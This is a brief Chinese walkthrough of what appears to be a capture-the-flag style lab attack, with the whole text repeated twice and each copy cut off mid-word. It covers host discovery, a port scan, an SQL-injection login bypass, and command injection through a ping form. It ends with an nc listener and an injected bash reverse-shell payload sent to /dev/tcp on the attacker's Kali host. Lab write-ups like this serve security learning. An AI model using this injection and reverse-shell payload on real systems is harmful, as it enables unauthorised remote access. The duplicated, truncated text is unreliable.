环境:靶机:192.168.1.107 kali:192.168.1.106
主机发现
端口扫描
浏览器登录80端口,发现登录页面,尝试sql注入绕过密码登录
成功进入,经典ping命令,存在命令执行
kali 开启监听,nc -lvp 6666, 靶机执行命令:127.0.0.1&bash -i >& /dev/tcp/192.168.1.106/6666 0>&1,反弹shell到 ka
环境:靶机:192.168.1.107 kali:192.168.1.106
主机发现
端口扫描
浏览器登录80端口,发现登录页面,尝试sql注入绕过密码登录
成功进入,经典ping命令,存在命令执行
kali 开启监听,nc -lvp 6666, 靶机执行命令:127.0.0.1&bash -i >& /dev/tcp/192.168.1.106/6666 0>&1,反弹shell到 ka